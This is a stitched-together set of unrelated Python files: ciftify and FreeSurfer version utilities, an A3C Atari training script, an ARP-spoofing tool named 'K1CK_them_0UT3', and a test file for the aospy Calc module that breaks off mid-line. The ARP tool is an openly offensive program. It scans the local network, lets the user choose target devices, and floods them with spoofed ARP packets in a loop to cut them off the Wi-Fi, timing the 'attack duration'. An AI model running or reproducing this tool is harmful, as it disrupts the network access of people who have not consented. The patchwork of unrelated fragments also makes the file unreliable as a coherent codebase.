None: raise OSError("wb_command not found. Please check that it is " "installed.") wb_help = util.check_output('wb_command') wb_version = wb_help.split(os.linesep)[0:3] sep = '{} '.format(os.linesep) wb_v = sep.join(wb_version) all_info = 'wb_command:{0}Path: {1}{0}{2}'.format(sep,wb_path,wb_v) return(all_info) def freesurfer_version(): ''' Returns version info for freesurfer ''' fs_path = find_freesurfer() if fs_path is None: raise OSError("Freesurfer cannot be found. Please check that " "it is installed.") try: fs_buildstamp = os.path.join(os.path.dirname(fs_path), 'build-stamp.txt') with open(fs_buildstamp) as text_file: bstamp = text_file.read() except: return "freesurfer build information not found." bstamp = bstamp.replace(os.linesep,'') info = "freesurfer:{0}Path: {1}{0}Build Stamp: {2}".format( '{} '.format(os.linesep),fs_path, bstamp) return info def fsl_version(): ''' Returns version info for FSL ''' fsl_path = find_fsl() if fsl_path is None: raise OSError("FSL not found. Please check that it is " "installed") try: fsl_buildstamp = os.path.join(fsl_path, 'etc', 'fslversion') with open(fsl_buildstamp) as text_file: bstamp = text_file.read() except: return "FSL build information not found." bstamp = bstamp.replace(os.linesep,'') info = "FSL:{0}Path: {1}{0}Version: {2}".format('{} '.format(os.linesep), fsl_path, bstamp) return info def ciftify_version(file_name=None): ''' Returns the path and the latest git commit number and date if working from a git repo, or the version number if working with an installed copy. 
''' logger = logging.getLogger(__name__) sep = '{} '.format(os.linesep) try: version = pkg_resources.get_distribution('ciftify').version except pkg_resources.DistributionNotFound: # Ciftify not installed, but a git repo, so return commit info pass else: return "ciftify:{}Version: {}".format(sep, version) try: dir_ciftify = util.check_output('which {}'.format(file_name)) except subprocess.CalledProcessError: file_name = None dir_ciftify = __file__ ciftify_path = os.path.dirname(dir_ciftify) git_log = get_git_log(ciftify_path) if not git_log: logger.error("Something went wrong while retrieving git log. Returning " "ciftify path only.") return "ciftify:{}Path: {}".format(sep, ciftify_path) commit_num, commit_date = read_commit(git_log) info = "ciftify:{0}Path: {1}{0}{2}{0}{3}".format('{} '.format(sep), ciftify_path, commit_num, commit_date) if not file_name: return info ## Try to return the file_name's git commit too, if a file was given file_log = get_git_log(ciftify_path, file_name) if not file_log: # File commit info not found return info commit_num, commit_date = read_commit(file_log) info = "{1}{5}Last commit for {2}:{0}{3}{0}{4}".format('{} '.format( os.linesep), info, file_name, commit_num, commit_date, os.linesep) return info def get_git_log(git_dir, file_name=None): git_cmd = ["cd {}; git log".format(git_dir)] if file_name: git_cmd.append("--follow {}".format(file_name)) git_cmd.append("| head") git_cmd = " ".join(git_cmd) # Silence stderr try: with open(os.devnull, 'w') as DEVNULL: file_log = util.check_output(git_cmd, stderr=DEVNULL) except subprocess.CalledProcessError: # Fail safe in git command returns non-zero value logger = logging.getLogger(__name__) logger.error("Unrecognized command: {} " "\nReturning empty git log.".format(git_cmd)) file_log = "" return file_log def read_commit(git_log): commit_num = git_log.split(os.linesep)[0] commit_num = commit_num.replace('commit', 'Commit:') commit_date = git_log.split(os.linesep)[2] return commit_num, commit_date def system_info(): ''' return formatted version of the system info''' sys_info = os.uname() sep = '{} '.format(os.linesep) info = "System Info:{0}OS: {1}{0}Hostname: {2}{0}Release: {3}{0}Version: " \ "{4}{0}Machine: {5}".format( sep, sys_info[0], sys_info[1], sys_info[2], sys_info[3], sys_info[4]) return info class FSLog: _MAYBE_HALTED = "FS may not have finished running." _ERROR = "Exited with error." 
def __init__(self, freesurfer_folder): logger = logging.getLogger(__name__) self._path = freesurfer_folder fs_scripts = os.path.join(freesurfer_folder, 'scripts') self.status = self._get_status(fs_scripts) self.build = self._get_build(os.path.join(fs_scripts, 'build-stamp.txt')) self.version = self.get_version(self.build) try: recon_contents = self.parse_recon_done(os.path.join(fs_scripts, 'recon-all.done')) except: logger.warning('Failed to parse the scripts/recon-all.done log') recon_contents = {} self.subject = self.get_subject(recon_contents.get('SUBJECT', '')) self.start = self.get_date(recon_contents.get('START_TIME', '')) self.end = self.get_date(recon_contents.get('END_TIME', '')) self.kernel = self.get_kernel(recon_contents.get('UNAME', '')) self.cmdargs = self.get_cmdargs(recon_contents.get('CMDARGS','')) self.args = self.get_args(recon_contents.get('CMDARGS', '')) self.nii_inputs = self.get_niftis(recon_contents.get('CMDARGS', '')) def read_log(self, path): try: with open(path) as log: contents = log.readlines() except OSError: return [] return contents def _get_status(self, scripts): error_log = os.path.join(scripts, 'recon-all.error') regex = os.path.join(scripts, '*') run_logs = [item for item in glob.glob(regex) if 'IsRunning' in item] recon_log = os.path.join(scripts, 'recon-all.done') if run_logs: status = self._MAYBE_HALTED elif os.path.exists(error_log): status = self._ERROR elif os.path.exists(recon_log): status = '' else: raise Exception("No freesurfer log files found for " "{}".format(scripts)) return status def _get_build(self, build_stamp): contents = self.read_log(build_stamp) if not contents: return '' return contents[0].strip('\n') def get_version(self, build): if 'v6.0.0' in build: return 'v6.0.0' if 'v5.3.0' in build: return 'v5.3.0' if 'v5.1.0' in build: return 'v5.1.0' else: return 'unknown' def parse_recon_done(self, recon_done): recon_contents = self.read_log(recon_done) if len(recon_contents) < 2: # If length is less than two, log is malformed and will cause a # crash when the for loop is reached below return {} parsed_contents = {} # Skip first line, which is just a bunch of dashes for line in recon_contents[1:]: # line = line.decode('utf-8') fields = line.strip('\n').split(None, 1) parsed_contents[fields[0]] = fields[1] return parsed_contents def get_subject(self, subject_field): if subject_field: return subject_field subject = os.path.basename(self._path) return subject def get_date(self, date_str): if not date_str: return '' # return datetime.datetime.strptime(date_str, '%a %b %d %X %Z %Y') return date_str def get_kernel(self, log_uname): if not log_uname: return '' return log_uname.split()[2] def get_cmdargs(self, cmd_args): if not cmd_args: return '' return cmd_args @staticmethod def get_args(cmd_args): if not cmd_args: return '' cmd_pieces = re.split(r'^-|\s-', cmd_args) args = cmd_pieces for item in ['i ', 'T2 ', 'subjid ']: args = filter(lambda x: not x.startswith(item), args) str_args = ' -'.join(sorted(args)) return str_args.strip() @staticmethod def get_niftis(cmd_args): if not cmd_args: return '' # Will break on paths containing white space nifti_inputs = re.findall(r'-i\s*\S*|-T2\s*\S*', cmd_args) niftis = [item.strip('-i').strip('-T2').strip() for item in nifti_inputs] return '; '.join(niftis)
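# A hedged example of stitching the helpers above into a single environment
# report. It assumes these functions are called from within this module (or
# after importing it); each *_version() helper raises OSError when its tool
# cannot be found, so that case is caught explicitly. The report layout is
# illustrative only.
def environment_report():
    lines = [system_info(), ciftify_version()]
    for check in (wb_command_version, fsl_version, freesurfer_version):
        try:
            lines.append(check())
        except OSError as err:
            lines.append("Missing dependency: {}".format(err))
    lines.append(msm_version())
    return (os.linesep * 2).join(lines)

if __name__ == '__main__':
    print(environment_report())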
#!/usr/bin/env python from skimage.transform import resize from skimage.color import rgb2gray import threading import tensorflow as tf import sys import random import numpy as np import time import gym from keras import backend as K from keras.layers import Convolution2D, Flatten, Dense from collections import deque from a3c_model import build_policy_and_value_networks from keras import backend as K from atari_environment import AtariEnvironment # Path params EXPERIMENT_NAME = "breakout_a3c" SUMMARY_SAVE_PATH = "/Users/coreylynch/dev/async-rl/summaries/"+EXPERIMENT_NAME CHECKPOINT_SAVE_PATH = "/tmp/"+EXPERIMENT_NAME+".ckpt" CHECKPOINT_NAME = "/tmp/breakout_a3c.ckpt-5" CHECKPOINT_INTERVAL=5000 SUMMARY_INTERVAL=5 # TRAINING = False TRAINING = True SHOW_TRAINING = True # SHOW_TRAINING = False # Experiment params GAME = "Breakout-v0" ACTIONS = 3 NUM_CONCURRENT = 8 NUM_EPISODES = 20000 AGENT_HISTORY_LENGTH = 4 RESIZED_WIDTH = 84 RESIZED_HEIGHT = 84 # DQN Params GAMMA = 0.99 # Optimization Params LEARNING_RATE = 0.00001 #Shared global parameters T = 0 TMAX = 80000000 t_max = 32 def sample_policy_action(num_actions, probs): """ Sample an action from an action probability distribution output by the policy network. """ # Subtract a tiny value from probabilities in order to avoid # "ValueError: sum(pvals[:-1]) > 1.0" in numpy.multinomial probs = probs - np.finfo(np.float32).epsneg histogram = np.random.multinomial(1, probs) action_index = int(np.nonzero(histogram)[0]) return action_index def actor_learner_thread(num, env, session, graph_ops, summary_ops, saver): # We use global shared counter T, and TMAX constant global TMAX, T # Unpack graph ops s, a, R, minimize, p_network, v_network = graph_ops # Unpack tensorboard summary stuff r_summary_placeholder, update_ep_reward, val_summary_placeholder, update_ep_val, summary_op = summary_ops # Wrap env with AtariEnvironment helper class env = AtariEnvironment(gym_env=env, resized_width=RESIZED_WIDTH, resized_height=RESIZED_HEIGHT, agent_history_length=AGENT_HISTORY_LENGTH) time.sleep(5*num) # Set up per-episode counters ep_reward = 0 ep_avg_v = 0 v_steps = 0 ep_t = 0 probs_summary_t = 0 s_t = env.get_initial_state() terminal = False while T < TMAX: s_batch = [] past_rewards = [] a_batch = [] t = 0 t_start = t while not (terminal or ((t - t_start) == t_max)): # Perform action a_t according to policy pi(a_t | s_t) probs = session.run(p_network, feed_dict={s: [s_t]})[0] action_index = sample_policy_action(ACTIONS, probs) a_t = np.zeros([ACTIONS]) a_t[action_index] = 1 if probs_summary_t % 100 == 0: print "P, ", np.max(probs), "V ", session.run(v_network, feed_dict={s: [s_t]})[0][0] s_batch.append(s_t) a_batch.append(a_t) s_t1, r_t, terminal, info = env.step(action_index) ep_reward += r_t r_t = np.clip(r_t, -1, 1) past_rewards.append(r_t) t += 1 T += 1 ep_t += 1 probs_summary_t += 1 s_t = s_t1 if terminal: R_t = 0 else: R_t = session.run(v_network, feed_dict={s: [s_t]})[0][0] # Bootstrap from last state R_batch = np.zeros(t) for i in reversed(range(t_start, t)): R_t = past_rewards[i] + GAMMA * R_t R_batch[i] = R_t session.run(minimize, feed_dict={R : R_batch, a : a_batch, s : s_batch}) # Save progress every 5000 iterations if T % CHECKPOINT_INTERVAL == 0: saver.save(session, CHECKPOINT_SAVE_PATH, global_step = T) if terminal: # Episode ended, collect stats and reset game session.run(update_ep_reward, feed_dict={r_summary_placeholder: ep_reward}) print "THREAD:", num, "/ TIME", T, "/ REWARD", ep_reward s_t = env.get_initial_state() terminal = False # Reset 
per-episode counters ep_reward = 0 ep_t = 0 def build_graph(): # Create shared global policy and value networks s, p_network, v_network, p_params, v_params = build_policy_and_value_networks(num_actions=ACTIONS, agent_history_length=AGENT_HISTORY_LENGTH, resized_width=RESIZED_WIDTH, resized_height=RESIZED_HEIGHT) # Shared global optimizer optimizer = tf.train.AdamOptimizer(LEARNING_RATE) # Op for applying remote gradients R_t = tf.placeholder("float", [None]) a_t = tf.placeholder("float", [None, ACTIONS]) log_prob = tf.log(tf.reduce_sum(p_network * a_t, reduction_indices=1)) p_loss = -log_prob * (R_t - v_network) v_loss = tf.reduce_mean(tf.square(R_t - v_network)) total_loss = p_loss + (0.5 * v_loss) minimize = optimizer.minimize(total_loss) return s, a_t, R_t, minimize, p_network, v_network # Set up some episode summary ops to visualize on tensorboard. def setup_summaries(): episode_reward = tf.Variable(0.) tf.summary.scalar("Episode Reward", episode_reward) r_summary_placeholder = tf.placeholder("float") update_ep_reward = episode_reward.assign(r_summary_placeholder) ep_avg_v = tf.Variable(0.) tf.summary.scalar("Episode Value", ep_avg_v) val_summary_placeholder = tf.placeholder("float") update_ep_val = ep_avg_v.assign(val_summary_placeholder) summary_op = tf.summary.merge_all() return r_summary_placeholder, update_ep_reward, val_summary_placeholder, update_ep_val, summary_op def train(session, graph_ops, saver): # Set up game environments (one per thread) envs = [gym.make(GAME) for i in range(NUM_CONCURRENT)] summary_ops = setup_summaries() summary_op = summary_ops[-1] # Initialize variables session.run(tf.global_variables_initializer()) writer = tf.summary.FileWriter(SUMMARY_SAVE_PATH, session.graph) # Start NUM_CONCURRENT training threads actor_learner_threads = [threading.Thread(target=actor_learner_thread, args=(thread_id, envs[thread_id], session, graph_ops, summary_ops, saver)) for thread_id in range(NUM_CONCURRENT)] for t in actor_learner_threads: t.start() # Show the agents training and write summary statistics last_summary_time = 0 while True: if SHOW_TRAINING: for env in envs: env.render() now = time.time() if now - last_summary_time > SUMMARY_INTERVAL: summary_str = session.run(summary_op) writer.add_summary(summary_str, float(T)) last_summary_time = now for t in actor_learner_threads: t.join() def evaluation(session, graph_ops, saver): saver.restore(session, CHECKPOINT_NAME) print "Restored model weights from ", CHECKPOINT_NAME monitor_env = gym.make(GAME) monitor_env.monitor.start('/tmp/'+EXPERIMENT_NAME+"/eval") # Unpack graph ops s, a_t, R_t, minimize, p_network, v_network = graph_ops # Wrap env with AtariEnvironment helper class env = AtariEnvironment(gym_env=monitor_env, resized_width=RESIZED_WIDTH, resized_height=RESIZED_HEIGHT, agent_history_length=AGENT_HISTORY_LENGTH) for i_episode in xrange(100): s_t = env.get_initial_state() ep_reward = 0 terminal = False while not terminal: monitor_env.render() # Forward the deep q network, get Q(s,a) values probs = p_network.eval(session = session, feed_dict = {s : [s_t]})[0] action_index = sample_policy_action(ACTIONS, probs) s_t1, r_t, terminal, info = env.step(action_index) s_t = s_t1 ep_reward += r_t print ep_reward monitor_env.monitor.close() def main(_): g = tf.Graph() with g.as_default(), tf.Session() as session: K.set_session(session) graph_ops = build_graph() saver = tf.train.Saver() if TRAINING: train(session, graph_ops, saver) else: evaluation(session, graph_ops, saver) if __name__ == "__main__": tf.app.run()
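# A standalone sketch of the n-step discounted return computed inside
# actor_learner_thread() above: rewards are accumulated backwards from a
# bootstrap value R (0 for terminal states, V(s_t) otherwise). Function name
# and example values are illustrative.
import numpy as np

def n_step_returns(rewards, bootstrap_value, gamma=0.99):
    """Compute R_t = r_t + gamma * R_{t+1}, seeded with the bootstrap value."""
    returns = np.zeros(len(rewards), dtype=np.float32)
    R = bootstrap_value
    for i in reversed(range(len(rewards))):
        R = rewards[i] + gamma * R
        returns[i] = R
    return returns

# Example: three clipped rewards with a bootstrapped value estimate of 0.5.
print(n_step_returns([1.0, 0.0, 1.0], bootstrap_value=0.5))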
#!/usr/bin/env python3 import time import os import sys import math import logging import platform from time import sleep from datetime import timedelta from ipaddress import IPv4Address import requests import R_spoof BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy! try: from scapy.all import * import nmap except ImportError: print("\n{0}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED)) print("\n{0}If you still cannot resolve this error, please submit an issue here:\n\t{1}https://github.com/R3DDY97/K1CK_them_0UT3/issues\n{2}".format(RED, BLUE, END)) raise SystemExit # check whether user is root if os.geteuid() != 0: print("\n{0}ERROR: K1CKThemOut3 must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python3 kick.py{2}\n".format(RED, GREEN, END)) raise SystemExit def heading(): spaces = " " * 70 sys.stdout.write(RED + spaces + """ KK KK IIIII CCCCC KK KK tt hh KK KK III CC C KK KK tt hh eee mm mm mmmm KKKK III CC KKKK tttt hhhhhh ee e mmm mm mm KK KK III CC C KK KK tt hh hh eeeee mmm mm mm KK KK IIIII CCCCC KK KK tttt hh hh eeeee mmm mm mm OOOOO UU UU TTTTTTT 333333 OO OO UU UU TTT 3333 OO OO UU UU TTT _____ 3333 OO OO UU UU TTT 333 OOOO0 UUUUU TTT 333333 """ + END + BLUE + '\n' + '{0}K1CK devices accesing your Wifi ({1}K1CK TH3M 0UT 3{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) + '\n' + 'Made With <3 by: {0}CH1TT1{3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) + '\n' + 'Version: {0}0.2{1}\n'.format(YELLOW, END).center(86)) def optionBanner(): print('\n\tChoose option from menu:\n') sleep(0.2) print('\t\t{0}[{1}1{2}]{3} K1CK ONE Off'.format( YELLOW, RED, YELLOW, WHITE)) sleep(0.2) print('\t\t{0}[{1}2{2}]{3} K1CK SOME Off'.format( YELLOW, RED, YELLOW, WHITE)) sleep(0.2) print('\t\t{0}[{1}3{2}]{3} K1CK ALL Off'.format( YELLOW, RED, YELLOW, WHITE)) sleep(0.2) print( '\n\t\t{0}[{1}E{2}]{3} Exit K1CK-Them-0UT\n'.format(YELLOW, RED, YELLOW, WHITE)) def vendorMAC(mac): url = "http://api.macvendors.com/{}".format(mac) response = requests.get(url) if response.ok: return response.text return "NA" def get_broadcast(gatewayIP): *head, tail = gatewayIP.split('.') head.append(str(int(tail) - 1)) gateway = ".".join(head) route_list = [i.split() for i in str(conf.route).splitlines()] for route in route_list: if route[0] == gateway: return route[1] def get_netmask(gateway): routing = scapy.config.conf.route.routes for i in routing: if int(IPv4Address(gateway)) in i: netmask = 32 - int(round(math.log(0xFFFFFFFF - (i[1]), 2))) return netmask def net_config(): global defaultInterface global defaultGatewayIP global defaultInterfaceIP global defaultInterfaceMAC global defaultGatewayMac global GatewayInterface defaultInterface = conf.iface defaultInterfaceIP = get_if_addr(defaultInterface) defaultInterfaceMAC = get_if_hwaddr(defaultInterface).upper() # routing = scapy.config.conf.route.routes # defaultGatewayIP = route_list[2][2] # defaultInterface, defaultInterfaceIP, defaultGatewayIP = conf.route.route("0.0.0.0")[2] defaultGatewayIP = conf.route.route("0.0.0.0")[2] defaultGatewayMac = getmacbyip(defaultGatewayIP).upper() broadcast = get_broadcast(defaultGatewayIP) netmask = get_netmask(broadcast) GatewayInterface = "{}/{}".format(defaultGatewayIP, netmask) def scanNetwork(): nm = nmap.PortScanner() scanDict = nm.scan(hosts=GatewayInterface, 
arguments='-sn') scan_data = scanDict['scan'] scan_stats = scanDict['nmap']['scanstats'] IPlist = [ip for ip in scan_data.keys() if ip not in [defaultGatewayIP, defaultInterfaceIP]] scan_stats['targets'] = len(IPlist) hosts_list = [] for host in IPlist: host_dict = {"ip": host} mac = scan_data[host]['addresses']['mac'] host_dict['vendor'] = scan_data[host]['vendor'].get(mac, '') host_dict['mac'] = mac hosts_list.append(host_dict) print_metadata(scan_stats) return hosts_list def print_metadata(scan_stats): elapsed_time = float(scan_stats["elapsed"]) uphosts = int(scan_stats["uphosts"]) timestr = scan_stats["timestr"] targets = scan_stats["targets"] print('''\n\t{}N3TW0RK scan summary :-\n{} Scan runtime : {}{}{} Interface : {}{}{} MAC : {}{}{} Gateway IP : {}{}{} uphosts : {}{}{} Target hosts : {}{}{}\n '''.format(YELLOW, WHITE, RED, elapsed_time, WHITE, RED, defaultInterface, WHITE, RED, defaultGatewayMac, WHITE, RED, defaultGatewayIP, WHITE, RED, uphosts, WHITE, RED, targets, END)) def print_hosts(hosts_list): print("{0}\tNo\t{1}IP ADDRESS\t {2}MAC ADDRESS\t\t{3}VENDOR NAME{4}\n".format(YELLOW, WHITE, RED, GREEN, END)) for n, host in enumerate(hosts_list, 1): print("{0}\t[{5}]\t{1}{6}\t{2}{7}\t{3}{8}{4}".format(YELLOW, WHITE, RED, GREEN, END, n, host['ip'], host['mac'], host['vendor'])) # ######################################################################################## # K1CK one device def K1CKoneoff(): os.system("clear||cls") print("\n{0}K1CK-ONE-0ff{1} iz selected...{2}\n".format(RED, GREEN, END)) sys.stdout.write("\n\t{0}Scanning your N3TW0RK, H4NG 0N...{1}\n\n\r".format(RED, END)) sys.stdout.flush() hosts_list = scanNetwork() print_hosts(hosts_list) while True: try: choice = int(input("\n\t{0}CH00SE the target:-{1} ".format(WHITE, END))) - 1 # print("HOST ===", hosts_list) target_host = hosts_list[choice] target_ip = target_host['ip'] target_mac =target_host['mac'] vendor = target_host['vendor'] break except KeyboardInterrupt: return except: print("\n{0}ERROR: Please enter a number from the list!{1}".format(RED, END)) print("\n\t{0}Target:- {5}{1} - {6}{3} - {7}{4} {2}".format(RED,target_ip, END, target_mac, vendor, WHITE, RED, GREEN)) print("\n\t {0}SP00FING has started...& Press CTRL+C keys to stop it {1}\n".format(BLUE, END)) print("\n \t {1} K1CK3D {0} - 0UT 0F Wifi{2}\n".format(target_ip, RED, END)) start = time.time() try: while True: # broadcast malicious ARP packets (10p/s) R_spoof.sendPacket(defaultInterfaceMAC, defaultGatewayIP, target_ip, target_mac) elapsed = timedelta(seconds=round(time.time() - start)) print("\r \t {0}ATT4CK DUR4T10N :- {1} seconds{2}".format(YELLOW, elapsed, END), end="") time.sleep(5) except KeyboardInterrupt: return ######################################################################################### # K1CK multiple devices def K1CKsomeoff(): os.system("clear||cls") print("\n{0}K1CK-S0ME-0ff{1} iz selected...{2}\n".format(RED, GREEN, END)) sys.stdout.write("\n\t{0}Scanning your N3TW0RK, H4NG 0N...{1}\r".format(GREEN, END)) sys.stdout.flush() hosts_list = scanNetwork() print_hosts(hosts_list) while True: try: choice = input("\nChoose devices to target(comma-separated): ") if ',' in choice: some_targets = [int(i.strip()) - 1 for i in choice.split(",")] print("\nSelected devices are:\n") for i in some_targets: print(hosts_list[i]['ip']) break except KeyboardInterrupt: return except ValueError: print("\n{}Enter comma separated above devices number\n{}".format(RED, END)) print( "\n\t{0}SP00FING has started...& Press CTRL+C keys to stop it 
{1}\n".format(BLUE, END)) print("\n \t{0}K1CK3D them 0UT 0F Wifi{1}\n".format(RED, END)) try: start = time.time() while True: # broadcast malicious ARP packets (10p/s) for i in some_targets: target_host = hosts_list[i] target_ip = target_host['ip'] target_mac =target_host['mac'] R_spoof.sendPacket(defaultInterfaceMAC, defaultGatewayIP, target_ip, target_mac) elapsed = timedelta(seconds=round(time.time() - start)) print( "\r \t {0}ATT4CK DUR4T10N :- {1} seconds{2}".format(YELLOW, elapsed, END), end="") time.sleep(5) except KeyboardInterrupt: return # ######################################################################################## # K1CK all devices def K1CKalloff(): os.system("clear||cls") print("\n{0}K1CK-ALL-Off{1} iz selected...{2}\n".format(RED, GREEN, END)) sys.stdout.write( "\n\t{0}Scanning your N3TW0RK, H4NG 0N...{1}\n".format(GREEN, END)) sys.stdout.flush() hosts_list = scanNetwork() print_hosts(hosts_list) print("\n\t {0}SP00FING has started...& Press CTRL+C keys to stop it {1}\n".format(BLUE, END)) print("\n \t {0}K1CK3D ALL 0UT 0F Wifi{1}\n".format(RED, END)) try: # broadcast malicious ARP packets (10p/s) start = time.time() reScan = 0 while True: for i in range(len(hosts_list)): target_host = hosts_list[i] target_ip = target_host['ip'] target_mac =target_host['mac'] R_spoof.sendPacket(defaultInterfaceMAC, defaultGatewayIP, target_ip, target_mac) elapsed = timedelta(seconds=round(time.time() - start)) print( "\r\t{0}ATT4CK DUR4T10N :- {1} seconds{2}".format(YELLOW, elapsed, END), end="") reScan += 1 if reScan == 4: reScan = 0 scanNetwork() time.sleep(5) except KeyboardInterrupt: return # ######################################################################################## # script's main function def main(): ip_mac_vendor = scanNetwork() # display warning in case of no active hosts if len(ip_mac_vendor) == 0: print("\n{}WARNING: There are no other uphosts on LAN .. Try again {}\n".format(RED, END)) raise SystemExit while True: optionBanner() header = ('{0}K1CKthemout{1}> {2}'.format(BLUE, WHITE, END)) choice = input(header) if choice.upper() == 'E' or choice.upper() == 'EXIT': print('\n\n\t\t{0}ThanK Y0U for DR0PP1NG by \n\n\t\tSEE U S00N!{1}\n\n\n'.format(YELLOW, END)) raise SystemExit elif choice == '1': K1CKoneoff() os.system("clear||cls") elif choice == '2': K1CKsomeoff() os.system("clear||cls") elif choice == '3': K1CKalloff() os.system("clear||cls") else: print("\n{0}ERROR: Please select a valid option.{1}\n".format(RED, END)) if __name__ == '__main__': try: os.system("clear||cls") heading() sys.stdout.write("\n\n{}Scanning your N3TW0RK, H4NG 0N...{}\n\r".format(YELLOW, END)) net_config() main() except KeyboardInterrupt: print('\n\n\t{0}ThanK Y0U for DR0PP1NG by \n \tSEE U S00N!{1}\n\n'.format( YELLOW, END))
#!/usr/bin/env python """Basic test of the Calc module on 2D data.""" import datetime from os.path import isfile import shutil import unittest import pytest import itertools import cftime import numpy as np import xarray as xr from aospy import Var from aospy.calc import Calc, _add_metadata_as_attrs, _replace_pressure from aospy.internal_names import ETA_STR from aospy.utils.vertcoord import p_eta, dp_eta, p_level, dp_level from .data.objects.examples import ( example_proj, example_model, example_run, var_not_time_defined, condensation_rain, convection_rain, precip, sphum, globe, sahel, p, dp ) def _test_output_attrs(calc, dtype_out): with xr.open_dataset(calc.path_out[dtype_out]) as data: expected_units = calc.var.units if calc.dtype_out_vert == 'vert_int': if expected_units != '': expected_units = ("(vertical integral of {0}):" " {0} m)").format(expected_units) else: expected_units = ("(vertical integral of quantity" " with unspecified units)") expected_description = calc.var.description for name, arr in data.data_vars.items(): assert expected_units == arr.attrs['units'] assert expected_description == arr.attrs['description'] def _clean_test_direcs(): for direc in [example_proj.direc_out, example_proj.tar_direc_out]: try: shutil.rmtree(direc) except OSError: pass def _test_files_and_attrs(calc, dtype_out): assert isfile(calc.path_out[dtype_out]) assert isfile(calc.path_tar_out) _test_output_attrs(calc, dtype_out) _2D_DATE_RANGES = { 'datetime': (datetime.datetime(4, 1, 1), datetime.datetime(6, 12, 31)), 'datetime64': (np.datetime64('0004-01-01'), np.datetime64('0006-12-31')), 'cftime': (cftime.DatetimeNoLeap(4, 1, 1), cftime.DatetimeNoLeap(6, 12, 31)), 'str': ('0004', '0006') } _3D_DATE_RANGES = { 'datetime': (datetime.datetime(6, 1, 1), datetime.datetime(6, 1, 31)), 'datetime64': (np.datetime64('0006-01-01'), np.datetime64('0006-01-31')), 'cftime': (cftime.DatetimeNoLeap(6, 1, 1), cftime.DatetimeNoLeap(6, 1, 31)), 'str': ('0006', '0006') } _2D_VARS = {'basic': condensation_rain, 'composite': precip} _2D_DTYPE_OUT_VERT = {'None': None} _2D_DTYPE_IN_VERT = {'None': None} _3D_VARS = {'3D': sphum} _3D_DTYPE_OUT_VERT = {'vert_int': 'vert_int', 'vert_av': 'vert_av'} _3D_DTYPE_IN_VERT = {'sigma': 'sigma'} _CASES = ( list(itertools.product(_2D_DATE_RANGES.items(), _2D_VARS.items(), _2D_DTYPE_IN_VERT.items(), _2D_DTYPE_OUT_VERT.items())) + list(itertools.product(_3D_DATE_RANGES.items(), _3D_VARS.items(), _3D_DTYPE_IN_VERT.items(), _3D_DTYPE_OUT_VERT.items())) ) _CALC_TESTS = {} for ((date_type, date_range), (test_type, var), (vert_in_label, vert_in), (vert_out_label, vert_out)) in _CASES: _CALC_TESTS['{}-{}-{}-{}'.format( date_type, test_type, vert_in_label, vert_out_label)] = ( date_range, var, vert_in, vert_out) @pytest.fixture(params=_CALC_TESTS.values(), ids=list(_CALC_TESTS.keys())) def test_params(request): date_range, var, vert_in, vert_out = request.param yield { 'proj': example_proj, 'model': example_model, 'run': example_run, 'var': var, 'date_range': date_range, 'intvl_in': 'monthly', 'dtype_in_time': 'ts', 'dtype_in_vert': vert_in, 'dtype_out_vert': vert_out } _clean_test_direcs() def test_annual_mean(test_params): calc = Calc(intvl_out='ann', dtype_out_time='av', **test_params) calc.compute() _test_files_and_attrs(calc, 'av') def test_annual_ts(test_params): calc = Calc(intvl_out='ann', dtype_out_time='ts', **test_params) calc.compute() _test_files_and_attrs(calc, 'ts') def test_seasonal_mean(test_params): calc = Calc(intvl_out='djf', dtype_out_time='av', **test_params) 
calc.compute() _test_files_and_attrs(calc, 'av') def test_seasonal_ts(test_params): calc = Calc(intvl_out='djf', dtype_out_time='ts', **test_params) calc.compute() _test_files_and_attrs(calc, 'ts') def test_monthly_mean(test_params): calc = Calc(intvl_out=1, dtype_out_time='av', **test_params) calc.compute() _test_files_and_attrs(calc, 'av') def test_monthly_ts(test_params): calc = Calc(intvl_out=1, dtype_out_time='ts', **test_params) calc.compute() _test_files_and_attrs(calc, 'ts') def test_simple_reg_av(test_params): calc = Calc(intvl_out='ann', dtype_out_time='reg.av', region=[globe], **test_params) calc.compute() _test_files_and_attrs(calc, 'reg.av') def test_simple_reg_ts(test_params): calc = Calc(intvl_out='ann', dtype_out_time='reg.ts', region=[globe], **test_params) calc.compute() _test_files_and_attrs(calc, 'reg.ts') @pytest.mark.filterwarnings('ignore:Mean of empty slice') def test_complex_reg_av(test_params): calc = Calc(intvl_out='ann', dtype_out_time='reg.av', region=[sahel], **test_params) calc.compute() _test_files_and_attrs(calc, 'reg.av') test_params_not_time_defined = { 'proj': example_proj, 'model': example_model, 'run': example_run, 'var': var_not_time_defined, 'date_range': 'default', 'intvl_in': 'monthly', 'dtype_in_time': 'av', 'intvl_out': 1, } @pytest.mark.parametrize('dtype_out_time', [None, []]) def test_calc_object_no_time_options(dtype_out_time): test_params_not_time_defined['dtype_out_time'] = dtype_out_time calc = Calc(**test_params_not_time_defined) if isinstance(dtype_out_time, list): assert calc.dtype_out_time == tuple(dtype_out_time) else: assert calc.dtype_out_time == tuple([dtype_out_time]) @pytest.mark.parametrize( 'dtype_out_time', ['av', 'std', 'ts', 'reg.av', 'reg.std', 'reg.ts']) def test_calc_object_string_time_options(dtype_out_time): test_params_not_time_defined['dtype_out_time'] = dtype_out_time with pytest.raises(ValueError): Calc(**test_params_not_time_defined) def test_calc_object_time_options(): time_options = ['av', 'std', 'ts', 'reg.av', 'reg.std', 'reg.ts'] for i in range(1, len(time_options) + 1): for time_option in list(itertools.permutations(time_options, i)): if time_option != ('None',): test_params_not_time_defined['dtype_out_time'] = time_option with pytest.raises(ValueError): Calc(**test_params_not_time_defined) @pytest.mark.parametrize( ('units', 'description', 'dtype_out_vert', 'expected_units', 'expected_description'), [('', '', None, '', ''), ('m', '', None, 'm', ''), ('', 'rain', None, '', 'rain'), ('m', 'rain', None, 'm', 'rain'), ('', '', 'vert_av', '', ''), ('m', '', 'vert_av', 'm', ''), ('', 'rain', 'vert_av', '', 'rain'), ('m', 'rain', 'vert_av', 'm', 'rain'), ('', '', 'vert_int', '(vertical integral of quantity with unspecified units)', ''), ('m', '', 'vert_int', '(vertical integral of m): m kg m^-2)', ''), ('', 'rain', 'vert_int', '(vertical integral of quantity with unspecified units)', 'rain'), ('m', 'rain', 'vert_int', 